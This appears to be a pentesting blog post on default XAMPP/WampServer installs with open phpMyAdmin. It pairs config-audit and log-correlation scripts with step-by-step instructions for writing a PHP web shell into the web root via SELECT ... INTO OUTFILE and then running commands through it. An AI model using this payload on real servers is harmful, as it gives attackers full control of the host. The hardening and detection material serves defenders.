Hello friends, today I'm going to discuss an interesting topic: XAMPP/WampServer. Both applications are easily available on the internet and easy to use. You can visit the following web sites for more information.
# http://www.apachefriends.org/en/xampp-windows.html
# http://www.wampserver.com/en/
During internal penetration tests, we noticed that most system administrators (in small or medium organizations) do not configure the web server (XAMPP/WampServer) properly: they simply deploy it with the default configuration, without setting a PHP/MySQL admin password.
Usually, with the default configuration, any user can access the admin console of that web server, and through this admin console a user can create, update or delete data on the MySQL database server. From the web admin console (phpinfo()), we can get the server installation path.
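The misconfiguration described above is visible in two files: phpMyAdmin's config.inc.php (XAMPP ships it with auth_type 'config', user root, an empty password and AllowNoPassword set to true) and MySQL/MariaDB's my.ini, where an empty secure_file_priv leaves SELECT ... INTO OUTFILE free to write anywhere the mysqld account can. The following audit script is an added example written for this post, not code from XAMPP, WampServer or phpMyAdmin; the config fragments it inspects are constructed for the example, and the upload directory in the hardened my.ini is an assumption.

```python
import re

# Constructed sample of a phpMyAdmin config.inc.php carrying XAMPP-style defaults
# (illustrative text written for this example, not copied from any installation).
SAMPLE_PMA_CONFIG = r"""
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""

# The same file after hardening: cookie login, empty passwords rejected, no stored password.
HARDENED_PMA_CONFIG = r"""
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
"""

# Constructed my.ini fragments: the first leaves INTO OUTFILE unrestricted, the second
# confines it to one upload directory (the directory path is an assumption for this example).
SAMPLE_MY_INI = """
[mysqld]
port=3306
secure_file_priv=""
"""
HARDENED_MY_INI = """
[mysqld]
port=3306
secure_file_priv="C:/xampp/mysql/upload"
"""

# Option files accept both secure_file_priv and secure-file-priv.
SECURE_FILE_PRIV_RE = re.compile(r'^\s*secure[-_]file[-_]priv\s*=\s*"?([^"\r\n]*)"?\s*$', re.M | re.I)


def audit_phpmyadmin_config(text):
    """Return human-readable findings for weak settings in a phpMyAdmin config.inc.php."""
    findings = []
    if re.search(r"\['auth_type'\]\s*=\s*'config'", text):
        findings.append("auth_type is 'config': whoever can reach phpMyAdmin is logged in without a prompt")
    if re.search(r"\['AllowNoPassword'\]\s*=\s*true", text):
        findings.append("AllowNoPassword is true: accounts with an empty MySQL password are accepted")
    m = re.search(r"\['password'\]\s*=\s*'([^']*)'", text)
    if m is not None and m.group(1) == "":
        findings.append("stored MySQL password is empty")
    return findings


def audit_mysql_ini(text):
    """Return findings about secure_file_priv, which bounds where SELECT ... INTO OUTFILE may write."""
    m = SECURE_FILE_PRIV_RE.search(text)
    if m is None:
        return ["secure_file_priv not set: the server default decides where INTO OUTFILE may write"]
    value = m.group(1).strip()
    if value == "":
        return ["secure_file_priv is empty: INTO OUTFILE may write anywhere the mysqld account can"]
    # NULL disables file export entirely; any other value confines writes to that one directory.
    return []


if __name__ == "__main__":
    for label, findings in [
        ("default phpMyAdmin", audit_phpmyadmin_config(SAMPLE_PMA_CONFIG)),
        ("hardened phpMyAdmin", audit_phpmyadmin_config(HARDENED_PMA_CONFIG)),
        ("default my.ini", audit_mysql_ini(SAMPLE_MY_INI)),
        ("hardened my.ini", audit_mysql_ini(HARDENED_MY_INI)),
    ]:
        print(label, "->", findings or ["ok"])
```

Run it against the real files on a server to get the same findings; the point of the hardened fragments is that fixing the three phpMyAdmin settings removes the unauthenticated console, and a non-empty secure_file_priv removes the database's ability to drop files into the document root even if someone does get in.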
I'll show how the phpMyAdmin console can be used to destroy a system; the steps are given below.
Step 1. Get the web server installation path (from phpinfo.php, test.php or any page that calls phpinfo()), say 'c:\XAMPP\htdocs'.
Step 2. Go to the phpMyAdmin section.
Step 3. Go to the Query/SQL tab.
Step 4. Enter the following SQL query into the input text area and submit it:
SELECT "<?php $c = $_GET['cmd']; $op = shell_exec($c); echo $op ?>" into OUTFILE "c:\XAMPP\htdocs\shell.php";
N.B.: The above SQL command creates a shell.php file on the web server.
Step 5. After executing the above command, the shell.php file is directly accessible, because it was created in the web directory.
Step 6. Access the shell.php file from your web browser:
http://x.x.x.x/shell.php?cmd=<your_command>
In the your_command field you can use any system command you want to execute. By doing this you get full control of the web server, and that is called Owned-THE-BOX.
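Two things have to be true for the steps above to work: the MySQL account needs the FILE privilege (root has it), and the mysqld process needs write permission on the document root. Both leave traces. The general query log records the INTO OUTFILE statement with its target path, and the Apache access log records the first request to the newly written file. The script below is an added example written for this post, not code from XAMPP or the page's author; it correlates the two logs on constructed sample lines (the log formats and the document root c:\XAMPP\htdocs are assumptions taken from the post).

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: the XAMPP document root the post uses.
WEB_ROOT = "c:\\XAMPP\\htdocs"

# Constructed MySQL/MariaDB general-log lines (time, thread id, command, argument).
SAMPLE_MYSQL_LOG = [
    "200101 10:00:01\t   12 Connect\troot@localhost on ",
    "200101 10:00:02\t   12 Query\tSHOW DATABASES",
    '200101 10:00:05\t   12 Query\tSELECT "<?php echo 1; ?>" INTO OUTFILE "c:/xampp/htdocs/shell.php"',
    "200101 10:00:09\t   12 Query\tSELECT name INTO OUTFILE 'C:/xampp/mysql/upload/export.csv' FROM t",
]

# Constructed Apache access-log lines in common log format.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /phpmyadmin/sql.php HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jan/2020:10:00:11 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 44',
    '10.0.0.7 - - [01/Jan/2020:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
]

# Both OUTFILE and DUMPFILE can drop a file; the quoted argument is the target path.
OUTFILE_RE = re.compile(r"""INTO\s+(?:OUTFILE|DUMPFILE)\s+['"]([^'"]+)['"]""", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')


def _norm(path):
    """Case-insensitive, forward-slash form so Windows paths compare reliably."""
    return path.replace("\\", "/").lower()


def find_webroot_outfile_writes(mysql_lines, web_root=WEB_ROOT):
    """Return (log_line, url_path) for each INTO OUTFILE/DUMPFILE whose target lies under the web root."""
    root = _norm(web_root).rstrip("/") + "/"
    hits = []
    for line in mysql_lines:
        m = OUTFILE_RE.search(line)
        if m is None:
            continue
        target = _norm(m.group(1))
        if target.startswith(root):
            # Translate the filesystem path into the URL path Apache would serve it under.
            hits.append((line, "/" + target[len(root):]))
    return hits


def find_requests_to_written_files(mysql_lines, access_lines, web_root=WEB_ROOT):
    """Correlate the two logs: requests for files that the database wrote into the web root."""
    written = {url_path for _, url_path in find_webroot_outfile_writes(mysql_lines, web_root)}
    alerts = []
    for line in access_lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        path = urlsplit(m.group(1)).path.lower()
        if path in written:
            alerts.append((line, path))
    return alerts


if __name__ == "__main__":
    for line, path in find_webroot_outfile_writes(SAMPLE_MYSQL_LOG):
        print("database wrote into web root:", path)
    for line, path in find_requests_to_written_files(SAMPLE_MYSQL_LOG, SAMPLE_ACCESS_LOG):
        print("request to database-written file:", line)
```

Matching on the written path rather than on a query parameter name keeps the rule independent of whatever parameter the dropped file happens to use. The export to the upload directory in the sample is deliberately left alone: with secure_file_priv pointing at that directory it is the only place INTO OUTFILE can write, so a hit under the document root is the signal worth alerting on. Running mysqld under a service account that cannot write to htdocs closes the path at the operating-system level as well.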